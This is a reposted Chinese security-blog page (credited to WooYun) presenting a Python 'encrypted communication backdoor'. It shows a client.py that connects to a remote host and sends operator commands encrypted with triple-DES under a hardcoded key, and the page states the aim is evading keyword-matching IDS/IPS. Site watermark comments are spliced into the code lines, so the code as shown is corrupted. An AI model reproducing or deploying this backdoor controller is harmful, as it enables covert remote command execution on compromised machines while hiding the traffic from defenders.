安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 编程茶楼 > Python > python加密通讯后门

python加密通讯后门

时间:2014-05-13来源:WOOYUN 作者:冷冷的夜点击:
加密通讯内容过一些检测数据包匹配关键字的ips和ids还是可以的,简单的demo
加密通讯内容过一些检测数据包匹配关键字的ips和ids还是可以的,简单的demo 
client.py 
# client    //内容来自安云网
import socket 
import time 
import binascii 
import base64 
import pyDes 
import sys 
#use des 
iv = '2132435465768797' 
key = 'aa000000000000000000000002200000000000aa0000000d' 
#data = "afuckfucdfadf" 
#des 

def encrypt(iv, key, data): 
    iv = binascii.unhexlify(iv) 
    key = binascii.unhexlify(key) 

//内容来自安云网


    k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5) 
    d = k.encrypt(data) 
    d = base64.encodestring(d) 
    return d 

def decrypt(iv, key, data): 
    iv = binascii.unhexlify(iv) 
    key = binascii.unhexlify(key) 
    k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5) 
    data = base64.decodestring(data) 
    d = k.decrypt(data) 
//安云网咨询系统

    return d 
if __name__ == '__main__': 
  print sys.argv[1]+sys.argv[2] 
  print 'client.py ip port' 
  address = (sys.argv[1], int(sys.argv[2])) 
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
  s.connect(address)   
  data =decrypt(iv,key,s.recv(512)) 
  print data 
  while True: 
    commond=raw_input()     
    s.send(encrypt(iv,key,commond))  //内容来自安云网
    time.sleep(1) 
    if(commond=='q'): 
      exit() 

    data = decrypt(iv,key,s.recv(9999)) 
    print data.rstrip('\n') 

  s.close()

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容